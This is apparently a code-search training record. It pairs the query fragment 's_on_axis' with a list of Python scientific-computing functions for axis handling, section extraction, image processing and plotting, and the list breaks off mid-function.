s_on_axis
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def othersn(ax):", "def _sections(self, axis=None, direction=None, cycle=None,\n concat_direction=False, concat_cycle=False, info=False,\n **kwargs):\n if axis is None:\n axis = ['x', 'y']\n if direction is None:\n direction = ['left', 'right']\n else:\n # A direction was chosen, prevent concat\n concat_direction = False\n if isinstance(direction, str):\n direction = [direction]\n if cycle is None:\n cycle = ['stress', 'release']\n else:\n # A cycle was chosen, prevent concat\n concat_cycle = False\n if isinstance(cycle, str):\n cycle = [cycle]\n\n sections = np.empty((0, 2), dtype=int)\n infos = np.empty((0, 3), dtype=str)\n\n # Get all requested segments\n # for ax, axi in zip(axis, range(len(axis))):\n for ax in axis:\n # separate release/stress and separate left/right -> x/y,\n # right/left, stress/release\n if not concat_cycle:\n for sec, dc in zip([d + c for d in direction for c in cycle],\n [[d, c] for d in direction for c in cycle]):\n for segment in self._sf.sections[ax]:\n sections = np.r_[sections, segment[sec]]\n if len(segment[sec]) > 0:\n seg_info = np.array([[ax, dc[0], dc[1]]]\n * len(segment[sec]))\n infos = np.r_[infos, seg_info]\n # concat release/stress and separate left/right -> x/y, right/left\n if concat_cycle and not concat_direction:\n # for d, di in zip(direction, range(len(direction))):\n for d in direction:\n for segment in self._sf.sections[ax]:\n sections = np.r_[sections, segment[d]]\n if len(segment[d]) > 0:\n seg_info = np.array([[ax, d, 'stressrelease']]\n * len(segment[d]))\n infos = np.r_[infos, seg_info]\n # concat release/stress and concat left/right -> x/y\n if concat_cycle and concat_direction:\n sections = np.r_[sections, self._sf.excited[ax]]\n if len(self._sf.excited[ax]) > 0:\n seg_info = np.array([[ax, 'leftright', 'stressrelease']]\n * len(self._sf.excited[ax]))\n infos = np.r_[infos, seg_info]\n\n if info:\n return sections, infos\n else:\n return sections", "def calc_axes(self):\n self.y_axis = np.linspace(0, self.image_shape[0] - 1, self.image_shape[0])\n self.x_axis = np.linspace(0, self.image_shape[1] - 1, self.image_shape[1])\n if hasattr(self, 'pixelsize'):\n self.y_axis *= self.pixelsize[0]\n self.x_axis *= self.pixelsize[1]\n\n # %%RETRIEVING FUNCTIONS", "def axis(ind):\n return ind % 15, ind // 15", "def analyze_natural_focusing(ps_beg, beamline, gamma, id_slices, zplot):\n\n ps_before = ps_beg\n\n count_UND = 0\n\n for element in beamline:\n ps_after = np.dot( element.M1, ps_before ) +element.M2\n\n # Check whether this element is an undulatorself.\n if isinstance(element, Undulator):\n count_UND += 1\n # The phase space distribution along the bunch before and after the\n # bunch.\n ps_s_before = beam_property_along_s(ps_before, id_slices)\n ps_s_after = beam_property_along_s(ps_after, id_slices)\n\n label1 = 'Before UND '+str(count_UND)\n label2 = 'After UND '+str(count_UND)\n save_name = 'Natural_focusing_in_UND'+str(count_UND)\n plt.figure()\n plt.plot(zplot[0:-1], ps_s_before[3,:]*gamma, label = label1)\n plt.plot(zplot[0:-1], ps_s_after[3,:]*gamma, label = label2)\n plt.grid()\n plt.legend()\n plt.savefig(save_name)\n ## End if\n\n ps_before = ps_after\n\n return", "def get_individual_manipulated_feature_centered(record,sensor,bins=100):\r\n \r\n #accesses the record's motion sensor\r\n ana=Analysis()\r\n ana.processRecord(record) \r\n motion=MotionProfileV2.extract(record)\r\n m = motion.vpsInDistance.toArray(sensor)\r\n \r\n #initializes variables\r\n my_range = np.linspace(-1,25,bins)\r\n d = np.zeros((len(my_range),1))\r\n prev=0\r\n index=0\r\n \r\n #iterates through the linspace vector\r\n for i in range(0,len(my_range)): \r\n cp=np.zeros((len(m),2))\r\n count=0\r\n \r\n #makes a copy of the values that fall within the given bin\r\n for j in range(0,len(m)):\r\n if m[j][0]+ ((25-record.motion.vehicleLength)/2-m[0][0]) >= my_range[i] and m[j][0]+ ((25-record.motion.vehicleLength)/2-m[0][0]) <= my_range[i+1]:\r\n cp[count][0]=m[j][0] + ((25-record.motion.vehicleLength)/2-m[0][0])\r\n cp[count][1]=m[j][1]\r\n count+=1\r\n\r\n #if there ARE changes within the bin (sensor switches from 0 or 1)\r\n if cp[0][0] != 0:\r\n \r\n #if there is ONLY ONE switch within the bin\r\n if cp[1][0] == 0:\r\n \r\n #if the sensor switches from 1 to 0\r\n if prev == 1:\r\n #finds the area\r\n d[index] = 1 - ((my_range[i+1] - cp[0][0])/(my_range[i+1]-my_range[i]))\r\n #increments the index and updates 'prev' accordingly\r\n index+=1\r\n prev=cp[0][1]\r\n \r\n #if the sensor switches from 0 to 1 \r\n else:\r\n #finds the are\r\n d[index] = ((my_range[i+1] - cp[0][0])/(my_range[i+1]-my_range[i]))\r\n #increments the index and updates 'prev' accordingly\r\n index+=1\r\n prev=cp[0][1]\r\n \r\n #if there are MORE than one switch within the bin \r\n else:\r\n value=0 \r\n #if the sensor switches from 1 to 0 then back any number of times\r\n if cp[0][1] == 1:\r\n #iterates through the copied matrix\r\n for j in range(0,len(cp),2):\r\n \r\n #finds the cumulative area\r\n if j+1<len(cp):\r\n if cp[j+1][0] == 0 and cp[j][0] != 0:\r\n value += my_range[i+1]-cp[j][0]\r\n prev=cp[j][1]\r\n else:\r\n value += cp[j+1][0] - cp[j][0]\r\n \r\n #adds the total area within the bin to the vector \r\n d[index] = value/(my_range[i+1]-my_range[i])\r\n index+=1\r\n \r\n #if the sensor switches from 0 to 1 then back any number of times \r\n else: \r\n #iterates through the copied matrix\r\n for j in range(0,len(cp),2):\r\n \r\n #finds the cumulative area\r\n if j+1<len(cp):\r\n if j == 0:\r\n value += cp[j][0] - my_range[i]\r\n prev=cp[j][1]\r\n elif cp[j][0] == 0 and cp[j-1][0] != 0:\r\n value += my_range[i+1]-cp[j-1][0]\r\n prev=cp[j-1][1]\r\n else:\r\n value += cp[j][0] - cp[j-1][0]\r\n \r\n #adds the total area within the bin to the vector \r\n d[index] = value/(my_range[i+1]-my_range[i])\r\n index+=1\r\n \r\n #if there ARE NOT changes within the bin (sensor stays either 0 or 1)\r\n elif cp[0][0] == 0:\r\n \r\n #changes the 'prev' variable accordingly and increments the index \r\n if prev == 0:\r\n d[index] = 0\r\n index+=1\r\n elif prev == 1:\r\n d[index] = 1\r\n index+=1\r\n \r\n #returns the individual sensor feature vector\r\n return(d)", "def dimension_along(self, axis):\n l, u = self._range_along(axis)\n return u - l", "def orient_shapes_hwd(data, slice_axis):\n if slice_axis == 0:\n return np.array(data)[[2, 1, 0]]\n elif slice_axis == 1:\n return np.array(data)[[2, 0, 1]]\n elif slice_axis == 2:\n return np.array(data)", "def __analyze(self):\n\n\t\t'''\n\t\ttodo: bSlabList.analyze() needs to step through each edge, not slabs !!!\n\t\t'''\n\n\t\tfor edgeIdx, edge in enumerate(self.edgeDictList):\n\t\t\tlen2d = 0\n\t\t\tlen3d = 0\n\t\t\tlen3d_nathan = 0\n\n\t\t\tslabList = edge['slabList']\n\t\t\tfor j, slabIdx in enumerate(slabList):\n\n\t\t\t\tx1 = self.x[slabIdx]\n\t\t\t\ty1 = self.y[slabIdx]\n\t\t\t\tz1 = self.z[slabIdx]\n\n\t\t\t\t#print('pointIdx:', pointIdx)\n\t\t\t\torig_x = self.orig_x[slabIdx]\n\t\t\t\torig_y = self.orig_y[slabIdx]\n\t\t\t\torig_z = self.orig_z[slabIdx]\n\n\t\t\t\tif j>0:\n\t\t\t\t\tlen3d = len3d + self.euclideanDistance(prev_x1, prev_y1, prev_z1, x1, y1, z1)\n\t\t\t\t\tlen2d = len2d + self.euclideanDistance(prev_x1, prev_y1, None, x1, y1, None)\n\t\t\t\t\tlen3d_nathan = len3d_nathan + self.euclideanDistance(prev_orig_x1, prev_orig_y1, prev_orig_z1, orig_x, orig_y, orig_z)\n\n\t\t\t\t# increment\n\t\t\t\tprev_x1 = x1\n\t\t\t\tprev_y1 = y1\n\t\t\t\tprev_z1 = z1\n\n\t\t\t\tprev_orig_x1 = orig_x\n\t\t\t\tprev_orig_y1 = orig_y\n\t\t\t\tprev_orig_z1 = orig_z\n\n\t\t\tedge['Len 2D'] = round(len2d,2)\n\t\t\tedge['Len 3D'] = round(len3d,2)\n\t\t\tedge['Len 3D Nathan'] = round(len3d_nathan,2)\n\n\t\t\t# diameter, pyqt does not like to display np.float, cast to float()\n\t\t\tmeanDiameter = round(float(np.nanmean(self.d[edge['slabList']])),2)\n\t\t\tedge['Diam'] = meanDiameter", "def yy(self):\n return self.exterior[:, 1]", "def axis_data(axis):\n x = mask.sum(axis)\n trimmed_front = N.trim_zeros(x,\"f\")\n offset = len(x)-len(trimmed_front)\n size = len(N.trim_zeros(trimmed_front,\"b\"))\n return offset,size", "def __calculateDDIstart(self, partedscans, partedspws):\n \n # Example of partedspws:\n # create 2 subMss with spw=0,1,2 and spw=3\n # partedSPWs = {0:['0','1','2'],1:['3']}\n #\n # create 3 subMSs with spw=0,1,2 spw=3 and spw=4,5\n # partedSPWs = {0:['0','1','2'],1:['3'],2:['4','5']}\n \n hasscans = True\n if len(partedscans) == 0:\n scans = ''\n hasscans = False\n\n # It needs to take the correlation selection into account\n corr_sel = self._arg['correlation']\n ddistartList = []\n \n # scan+spw separation axis \n if hasscans:\n count = 0\n for k,spws in partedspws.iteritems():\n for ks,scans in partedscans.iteritems():\n if self._msTool is None:\n self._msTool = mstool()\n self._msTool.open(self._arg['vis'],nomodify=False)\n else:\n self._msTool.reset()\n \n try:\n # The dictionary with selected indices\n seldict = self._msTool.msseltoindex(vis=self._arg['vis'],scan=scans,spw=spws,polarization=corr_sel)\n except:\n self._msTool.close()\n continue\n \n # Get the selected DD IDs\n ddis = seldict['dd'].tolist()\n ddsize = ddis.__len__()\n if count == 0:\n ddistart = 0\n \n # Create a ddistart list\n ddistartList.append(ddistart)\n ddistart = ddistart + ddsize\n count = count + 1\n \n # spw separation axis \n else:\n count = 0\n for k,spws in partedspws.iteritems():\n if self._msTool is None:\n self._msTool = mstool()\n self._msTool.open(self._arg['vis'],nomodify=False)\n else:\n self._msTool.reset()\n \n try:\n # The dictionary with selected indices\n seldict = self._msTool.msseltoindex(vis=self._arg['vis'],scan=scans,spw=spws, polarization=corr_sel)\n except:\n self._msTool.reset()\n continue\n \n # Get the selected DD IDs\n ddis = seldict['dd'].tolist()\n ddsize = ddis.__len__()\n if count == 0:\n ddistart = 0\n \n # Create a ddistart list\n ddistartList.append(ddistart)\n ddistart = ddistart + ddsize\n count = count + 1\n \n return ddistartList", "def data_separation(self, n_extrema=2, ind_extrema=[0,-1], verbosity=1):\n\n self.fullspace = []\n self.z_requested = np.array([self.z_requested]).flatten()\n\n ## fullspace: array of all multiindex values in the noiseless case \n for z in np.array(self.z_requested):\n for iind in (self.df_ext.loc[self.data_type,z].index):\n ## values of the redshift are only included, if there is data for multiple redshift values\n if self.multiple_z == False:\n self.fullspace.append(list(iind)[1::2])\n else:\n self.fullspace.append(np.array([z]+list(iind)[1::2]))\n self.fullspace=np.array(self.fullspace)\n\n self.size_fullspace = len(self.fullspace) \n self.ind_fullspace = np.array(range(self.size_fullspace))\n\n ## extremaspace: array of multiindex values of the spectra considered \"extrema\"\n self.ind_extremaspace = self.ind_fullspace[ind_extrema]\n self.extremaspace = self.fullspace[self.ind_extremaspace]\n self.size_extremaspace = len(self.extremaspace)\n\n ## midspace: array of all multiindex values except for the extrema\n self.ind_midspace = np.setdiff1d(self.ind_fullspace, self.ind_extremaspace)\n self.midspace = self.fullspace[self.ind_midspace]\n self.size_midspace = len(self.midspace)\n\n ## print details if verbosity >= level\n too.condprint(\"length of full sample space\", self.size_fullspace, level=2, verbosity=verbosity)\n too.condprint(\"full sample space list\", self.fullspace, level=3, verbosity=verbosity)\n too.condprint(\"length of extrema sample space\", self.size_extremaspace, level=2, verbosity=verbosity)\n too.condprint(\"full sample space list\", self.extremaspace, level=3, verbosity=verbosity)\n\n return None", "def intersection(self, axis2):", "def calc_axes(self):\n y_axis = np.linspace(0, self.image_shape[0] - 1, self.image_shape[0])\n x_axis = np.linspace(0, self.image_shape[1] - 1, self.image_shape[1])\n if hasattr(self, 'pixelsize'):\n y_axis *= self.pixelsize[0]\n x_axis *= self.pixelsize[1]\n return x_axis, y_axis", "def segment(data):", "def get_section_stats(bd, section_rows, section_cols, parameter_object, section_counter):\r\n\r\n if parameter_object.trigger in ['pantex', 'lac']:\r\n out_d_range = (0, 31)\r\n else:\r\n out_d_range = (0, 255)\r\n\r\n # Scale the data to an 8-bit range.\r\n if (bd.dtype != 'uint8') and (parameter_object.trigger not in parameter_object.spectral_indices):\r\n\r\n bd = np.uint8(rescale_intensity(bd,\r\n in_range=(parameter_object.image_min,\r\n parameter_object.image_max),\r\n out_range=out_d_range))\r\n\r\n # Apply histogram equalization.\r\n if parameter_object.trigger != 'dmp':\r\n\r\n if parameter_object.equalize:\r\n bd = equalize_hist(bd, nbins=256)\r\n\r\n elif parameter_object.equalize_adapt:\r\n \r\n bd = equalize_adapthist(bd,\r\n kernel_size=(int(section_rows / 128),\r\n int(section_cols / 128)),\r\n clip_limit=.05,\r\n nbins=256)\r\n\r\n if parameter_object.equalize or parameter_object.equalize_adapt:\r\n\r\n bd = np.uint8(rescale_intensity(bd,\r\n in_range=(0., 1.0),\r\n out_range=(0, 255)))\r\n\r\n # Remove image noise.\r\n if parameter_object.smooth > 0:\r\n bd = np.uint8(cv2.bilateralFilter(bd, parameter_object.smooth, 0.1, 0.1))\r\n\r\n # elif parameter_object.trigger == 'lbp':\r\n #\r\n # if parameter_object.visualize:\r\n # bdOrig = bd.copy()\r\n #\r\n # elif parameter_object.trigger == 'hough':\r\n #\r\n # # for display (testing) purposes only\r\n # if parameter_object.visualize:\r\n # bdOrig = bd.copy()\r\n #\r\n # # test canny and hough lines\r\n # if parameter_object.visualize:\r\n #\r\n # # for display purposes only\r\n # bdOrig = bd.copy()\r\n #\r\n # test_plot(bd, bdOrig, parameter_object.trigger, parameter_object)\r\n\r\n # Get the row and column section chunk indices.\r\n # chunk_indices = get_chunk_indices(section_rows,\r\n # section_cols,\r\n # parameter_object.block,\r\n # parameter_object.chunk_size,\r\n # parameter_object.scales[-1])\r\n\r\n func_dict = dict(dmp=dict(name='Differential Morphological Profiles',\r\n args=dict()),\r\n evi2=dict(name='Two-band Enhanced Vegetation Index',\r\n args=dict()),\r\n fourier=dict(name='Fourier transfrom',\r\n args=dict()),\r\n gabor=dict(name='Gabor filters',\r\n args=dict()),\r\n gndvi=dict(name='Green Normalized Difference Vegetation Index',\r\n args=dict()),\r\n grad=dict(name='Gradient magnitude',\r\n args=dict()),\r\n hog=dict(name='Histogram of Oriented Gradients',\r\n args=dict()),\r\n lac=dict(name='Lacunarity',\r\n args=dict(lac_r=parameter_object.lac_r)),\r\n lbp=dict(name='Local Binary Patterns',\r\n args=dict()),\r\n lbpm=dict(name='Local Binary Patterns moments',\r\n args=dict()),\r\n lsr=dict(name='Line support regions',\r\n args=dict()),\r\n mean=dict(name='Mean',\r\n args=dict()),\r\n ndvi=dict(name='Normalized Difference Vegetation Index',\r\n args=dict()),\r\n pantex=dict(name='PanTex',\r\n args=dict(weight=parameter_object.weight)),\r\n orb=dict(name='Oriented FAST and Rotated BRIEF key points',\r\n args=dict()),\r\n saliency=dict(name='Image saliency',\r\n args=dict()),\r\n seg=dict(name='Segmentation',\r\n args=dict()),\r\n sfs=dict(name='Structural Feature Sets',\r\n args=dict(sfs_threshold=parameter_object.sfs_threshold,\r\n sfs_skip=parameter_object.sfs_skip)))\r\n\r\n for idx in parameter_object.spectral_indices:\r\n if idx not in func_dict:\r\n func_dict[idx] = {'name': idx, 'args': {}}\r\n\r\n logger.info(' Processing {} for section {:,d} of {:,d} ...'.format(func_dict[parameter_object.trigger]['name'],\r\n section_counter,\r\n parameter_object.n_sects))\r\n\r\n other_args = func_dict[parameter_object.trigger]['args']\r\n\r\n if parameter_object.trigger in parameter_object.spectral_indices:\r\n trigger = 'mean'\r\n else:\r\n trigger = parameter_object.trigger\r\n\r\n return call_func(bd,\r\n parameter_object.block,\r\n parameter_object.scales,\r\n parameter_object.scales[-1],\r\n trigger,\r\n **other_args)\r\n\r\n # return Parallel(n_jobs=parameter_object.n_jobs_chunk,\r\n # max_nbytes=None)(delayed(call_func)(bd[chi[0]:chi[1],\r\n # chi[2]:chi[3]],\r\n # parameter_object.block,\r\n # parameter_object.scales,\r\n # parameter_object.scales[-1],\r\n # parameter_object.trigger,\r\n # **other_args) for chi in chunk_indices)\r", "def horde_step(self, observation):", "def _axes(self, X):\n \n return np.arange(len(X.shape) - 1) + 1", "def _filter_axes(self, channel_axis, spatial_axes):\n f_axes = ng.make_axis(length=self.nout, name=\"K\")\n for key, ax in zip(\"DHW\", spatial_axes):\n f_axes += ng.make_axis(length=self.filter_shape[key],\n name=ax.name)\n f_axes += channel_axis\n return f_axes", "def addSTDdevIndices(img):\n\t\t\timg = img.addBands(img.normalizedDifference(['green','swir1']).rename(['ND_green_swir1'])); # NDSI, MNDWI\n\t\t\timg = img.addBands(img.normalizedDifference(['nir','red']).rename(['ND_nir_red'])); # NDVI\n\t\t\timg = img.addBands(img.normalizedDifference(['nir','swir2']).rename(['ND_nir_swir2'])); # NBR, MNDVI\n\t\t\t\n\t\t\treturn img;", "def getAxis(self,axis):\n\n\t\tif axis == \"u\":\n\t\t\tif len(self.usr) != 0:\n\t\t\t\treturn np.append([0], self.usr)\n\n\t\tif axis == \"s\":\n\t\t\tif len(self.seg) != 0:\n\t\t\t\tif self.radiograph:\n\t\t\t\t\treturn self.seg\n\t\t\t\telse:\n\t\t\t\t\tfirst = self.seg[0] - 1.\n\t\t\t\t\treturn np.append([first], self.seg)\n\n\t\tif axis == \"c\":\n\t\t\tif len(self.cos) != 0:\n\t\t\t\tif self.radiograph:\n\t\t\t\t\treturn self.cos\n\t\t\t\telse:\n\t\t\t\t\tfirst = -1.\n\t\t\t\t\treturn np.append([first], self.cos)\n\n\t\tif axis == \"e\":\n\t\t\tif len(self.erg) != 0:\n\t\t\t\tfirst = self.erg[0] - 1.\n\t\t\t\treturn np.append([first], self.erg)\n\n\t\tif axis == \"t\":\n\t\t\tif len(self.tim) != 0:\n\t\t\t\tfirst = self.tim[0] - 1.\n\t\t\t\treturn np.append([first], self.tim)\n\n\t\tif axis == \"i\":\n\t\t\treturn self.cora\n\n\t\tif axis == \"j\":\n\t\t\treturn self.corb\n\n\t\tif axis == \"k\":\n\t\t\treturn self.corc\n\n\t\treturn []", "def setAxisParts(lowx='all', lefty='all', upx='ticks', righty='ticks'):\n partdict = {'none':'NONE','lines':'LINE','ticks':'TICKS',\n 'labels':'LABELS', 'all':'NAME'} \n dislin.setgrf(partdict[lowx], partdict[lefty],\\\n partdict[upx], partdict[righty])", "def noAxisSystem():\n dislin.nograf()", "def get_out_dims(section_rows, section_cols, parameter_object):\r\n\r\n bl = parameter_object.block\r\n sc = parameter_object.scales[-1]\r\n scale_block_diff = sc - bl\r\n\r\n out_rows = len(range(0, section_rows-scale_block_diff, bl))\r\n out_cols = len(range(0, section_cols-scale_block_diff, bl))\r\n\r\n return out_rows, out_cols", "def plot_autocorrs(self, axis=0, n_rows=4, n_cols=8):\n self.current_plot = 'multi'\n self.ax_zoomed = False\n \n bls = self.uv.d_uv_data['BASELINE']\n\n # Extract the relevant baselines using a truth array\n # bls = bls.tolist()\n bl_ids = set([256*i + i for i in range(1, n_rows * n_cols + 1)])\n bl_truths = np.array([(b in bl_ids) for b in bls])\n \n #print self.uv.d_uv_data['DATA'].shape\n #x_data = self.d_uv_data['DATA'][bl_truths,0,0,:,0,axis] # Baselines, freq and stokes\n #x_cplx = x_data[:,:,0] + 1j * x_data[:,:,1]\n\n x_cplx = self.stokes[axis][bl_truths]\n\n\n \n # Plot the figure\n #print self.uv.n_ant\n fig = self.sp_fig\n figtitle = '%s %s: %s -- %s'%(self.uv.telescope, self.uv.instrument, self.uv.source, self.uv.date_obs)\n for i in range(n_rows):\n for j in range(n_cols):\n ax = fig.add_subplot(n_rows, n_cols, i*n_cols + j +1)\n ax.set_title(self.uv.d_array_geometry['ANNAME'][i*n_cols + j], fontsize=10)\n #ax.set_title(\"%s %s\"%(i, j))\n \n x = x_cplx[i*n_cols+j::self.uv.n_ant]\n \n if self.scale_select.currentIndex() == 0 or self.scale_select.currentIndex() == 1:\n if x.shape[0] == self.uv.n_ant:\n self.plot_spectrum(ax, x, label_axes=False)\n else:\n self.plot_spectrum(ax, x, stat='max', label_axes=False)\n self.plot_spectrum(ax, x, stat='med', label_axes=False)\n self.plot_spectrum(ax, x, stat='min', label_axes=False)\n else:\n self.plot_spectrum(ax, x, label_axes=False)\n self.updateFreqAxis(ax)\n \n if i == n_rows-1:\n ax.set_xlabel('Freq')\n if j == 0:\n ax.set_ylabel('Amplitude')\n \n plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n plt.tick_params(axis='both', which='major', labelsize=10)\n plt.tick_params(axis='both', which='minor', labelsize=8)\n plt.xticks(rotation=30)\n \n plt.subplots_adjust(left=0.05, right=0.98, top=0.95, bottom=0.1, wspace=0.3, hspace=0.45)\n return fig, ax", "def test_find_dispersion_axis():\n dm = SlitModel()\n\n dm.meta.wcsinfo.dispersion_direction = 1 # horizontal\n assert find_dispersion_axis(dm) == 0 # X axis for wcs functions\n\n dm.meta.wcsinfo.dispersion_direction = 2 # vertical\n assert find_dispersion_axis(dm) == 1 # Y axis for wcs functions", "def fiber_alignment(config, ind=0):\n files = sorted(\n glob.glob(config['raw_dir'] + '/radiance/{}/data/data_*.txt'.format(\n config['date'])))\n\n # load data from txt file\n txt = np.genfromtxt(files[ind], delimiter='', skip_header=11)\n\n align = add_align()\n\n # extract pixels of alignment\n pixels = align['pixel'] + config['channel_pixel_adj']\n\n plt.figure(figsize=(12, 9), dpi=300)\n\n ax1 = plt.subplot2grid((2, 4), (0, 0), colspan=4)\n ax1.plot(txt[500, :], '-*')\n ax1.axis([0, 1060, 0, txt[500, :].max() + 20])\n for xc in pixels:\n plt.axvline(x=xc, color='r')\n plt.xlabel('pixels')\n plt.ylabel('counts')\n plt.title('Channel alignment')\n \n ax2 = plt.subplot2grid((2, 4), (1, 0), colspan=2)\n # First section\n ax2.plot(txt[500, :], '-*')\n ax2.axis([0, 200, 0, txt[500, :].max() + 20])\n for xc in pixels:\n plt.axvline(x=xc, color='r')\n plt.xlabel('pixels')\n plt.ylabel('counts')\n plt.title('Initial section')\n\n ax3 = plt.subplot2grid((2, 4), (1, 2), colspan=2)\n # final section\n ax3.plot(txt[500, :], '-*')\n ax3.axis([800, 1060, 0, txt[500, :].max() + 20])\n for xc in pixels:\n plt.axvline(x=xc, color='r')\n plt.xlabel('pixels')\n plt.ylabel('counts')\n plt.title('Final section')\n\n plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\n plt.show()", "def system_fleet_dimensioning(self):", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def plot_section(file_handle, xq, ax, data1, data2,im=250, eta='e',yvar='yh', rep='pcm', xlim=(0,650), ylim=(-2000,0), cmap=plt.cm.bwr, hidex=False, hidey=False, m1=-2, m2=2):\n font = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 18,\n }\n\n e = file_handle.variables[eta][-24::,:,:,im].mean(axis=0) # Vertical grid positions\n y = file_handle.variables[yvar][:]\n x,z,q = m6toolbox.section2quadmesh(xq, e, data1, representation=rep) # This yields three areas at twice the model resolution\n #cs = ax.pcolormesh(x, z, q,norm=LogNorm(vmin=1, vmax=110), cmap=cmap)\n cs = ax.pcolormesh(x, z, q, vmin=m1, vmax=m2, cmap=cmap)\n if (len(data2.shape)>1):\n z = 0.5*(e[0:-1,:]+e[1:,:])\n [Y,TMP] = np.meshgrid(y,z[:,0])\n s = ax.contour(Y,z,data2-1000,[37.1],colors='gray',lw=10)\n ax.clabel(s, inline=1, fontsize=16,fmt='%4.2f', manual=[(500,-500)])\n else:\n print 'data2 will not be plotted!'\n #ax.plot(y,data2,'gray',lw=2);\n\n ax.set_ylim(ylim)\n ax.set_xlim(xlim)\n if not hidex:\n #ax.axes.get_xaxis().set_ticks([])\n ax.set_xlabel('y [km]')\n\n if not hidey:\n #ax.axes.get_yaxis().set_ticks([])\n ax.set_ylabel('Depth [m]')\n\n return cs", "def dimensions():", "def _ul_lr(self):\n ulx, xres, xskew, uly, yskew, yres = self.geotransform\n # Index from the end - GDal usually orders bands-first:\n lrx = ulx + (self.array.shape[-2] * xres)\n lry = uly + (self.array.shape[-1] * yres)\n return ulx, uly, lrx, lry", "def autoidentify(self, rstep=1, istart=None, nrows=1, oneline=True):\n #update the line list such that it is only the line list of selected lines\n if self.wp:\n slines=np.array(self.wp)\n sfluxes=np.zeros(len(slines))\n for i in range(len(slines)):\n try:\n sfluxes[i]=self.sfluxes[self.slines==slines[i]][0]\n except:\n if sfluxes.mean()==0: \n sfluxes[i]=1\n else:\n sfluxes[i]=sfluxes.mean()\n \n else:\n slines=self.slines\n sfluxes=self.sfluxes\n \n iws=ai.AutoIdentify(self.xarr, self.specarr, slines, sfluxes, self.ws, farr=self.farr,method=self.method, rstep=rstep, istart=istart, nrows=nrows, res=self.res, dres=self.dres, mdiff=self.mdiff, sigma=self.sigma, niter=self.niter, dc=self.dc, ndstep=self.ndstep, oneline=oneline, log=self.log, verbose=self.verbose)\n if oneline:\n self.ws=iws\n else:\n return iws", "def prepare(self):\n if self.pin.lower() == \"homo\":\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.Lead_HOMOs_xval[i] for x in line]\n elif self.pin.lower() == \"lumo\":\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.Lead_LUMOs_xval[i] for x in line]\n elif \"vac\" in self.pin.lower():\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.vacuum[i] for x in line]\n elif \"ef\" in self.pin.lower():\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.fermi_levels[i] for x in line]", "def test():\n\n file = 'crosssection.dat'\n f = open(file,'r')\n lines = f.readlines()\n nline = len(lines)\n points = np.zeros(shape=(nline,4))\n sigtable = np.zeros(nline)\n for i in range(nline):\n points[i,0] = float(lines[i].split()[0])\n points[i,1] = float(lines[i].split()[1])\n points[i,2] = float(lines[i].split()[2])\n points[i,3] = float(lines[i].split()[3])\n sigtable[i] = float(lines[i].split()[4])\n\n nbin = 60\n npts = nline/nbin\n\n # checking lensing cross section against magnitude\n '''\n for i in range(npts):\n plt.plot(points[i*nbin:(i+1)*nbin,3],sigtable[i*nbin:(i+1)*nbin])\n plt.show()\n '''\n npts = npts/nbin\n\n # checking lensing cross section against velocity dispersion\n '''\n for i in range(nline):\n mask, = np.where((points[:,1]==points[i,1])&(points[:,0]==points[i,0])\\\n &(points[:,3]==points[i,3]))\n vel = points[mask,2]\n sigma = sigtable[mask]\n plt.plot(vel,sigma)\n plt.show()\n '''\n\n # checking lensing cross section against lens redshift\n #'''\n for i in range(3000,nline):\n mask, = np.where((points[:,1]==points[i,1])&(points[:,2]==points[i,2])\\\n &(points[:,3]==points[i,3]))\n print mask\n zl = points[mask,0]\n sigma = sigtable[mask]\n plt.plot(zl,sigma)\n plt.show()\n #'''\n\n # checking lensing cross section against source redshift\n for i in reversed(range(nline)):\n mask, = np.where((points[:,0]==points[i,0])&(points[:,2]==points[i,2])\\\n &(points[:,3]==points[i,3]))\n print mask\n zs = points[mask,1]\n sigma = sigtable[mask]\n plt.plot(zs,sigma)\n plt.show()", "def section_linearization(self,strain):\r\n\t\tcentroidal_axis = self.depth*0.5\r\n\t\treturn self.sectional_force(strain),\\\r\n\t\t\tself.sectional_moment(strain,centroidal_axis)", "def getDimensions():", "def getVerticalIntegrated(ds, okMap=None, normalization=-1, axis=1, cluster=(0.0,'None'),top=None,bottom=None):\n print 'vertical integration of', ds.title\n start_dim = ds.ndim\n\n if (okMap is not None) and (okMap.ndim != 2):\n raise AttributeError('okMap.ndim != 2')\n\n # check shape\n if (okMap is not None) and (ds.shape != okMap.shape):\n raise AttributeError('ds.shape != okMap.shape') \n\n # JRH strategy: we need to sum vertically, accumulating individual pixel\n # errors as we go, and counting the contributions.\n #\n # The okmap should give us contributions by summing vertically\n # Note that we are assuming at least 0.1 count in every valid pixel\n \n import time\n if bottom is None or bottom < 0: bottom = 0\n if top is None or top >= ds.shape[0]: top = ds.shape[0]-1\n working_slice = ds[bottom:top,:]\n totals = working_slice.intg(axis=axis)\n contrib_map = zeros(working_slice.shape,dtype=int)\n contrib_map[working_slice>-1] = 1 #Disabled\n contribs = contrib_map.intg(axis=axis)\n #\n # We have now reduced the scale of the problem by 100\n #\n # Normalise to the maximum number of contributors\n print 'Axes labels:' + `ds.axes[0].title` + ' ' + `ds.axes[1].title`\n max_contribs = float(contribs.max())\n #\n print 'Maximum no of contributors %f' % max_contribs\n contribs = contribs/max_contribs #\n save_var = totals.var\n totals = totals / contribs #Any way to avoid error propagation here?\n totals.var = save_var/contribs\n\n # finalize result\n totals.title = ds.title\n totals.copy_cif_metadata(ds)\n info_string = \"Data were vertically integrated from pixels %d to %d (maximum number of contributors %d).\\n\" % (bottom,top,max_contribs)\n \n # check if any axis needs to be converted from boundaries to centers\n new_axes = []\n for i in range(totals.ndim):\n if len(totals.axes[i]) == totals.shape[i] + 1:\n new_axes.append(getCenters(totals.axes[i]))\n else:\n new_axes.append(totals.axes[i])\n print 'Axis %d: %s' % (i,totals.axes[i].title)\n old_names = map(lambda a:a.name,totals.axes)\n old_units = map(lambda a:a.units,totals.axes)\n old_names[-1] = 'Two theta'\n 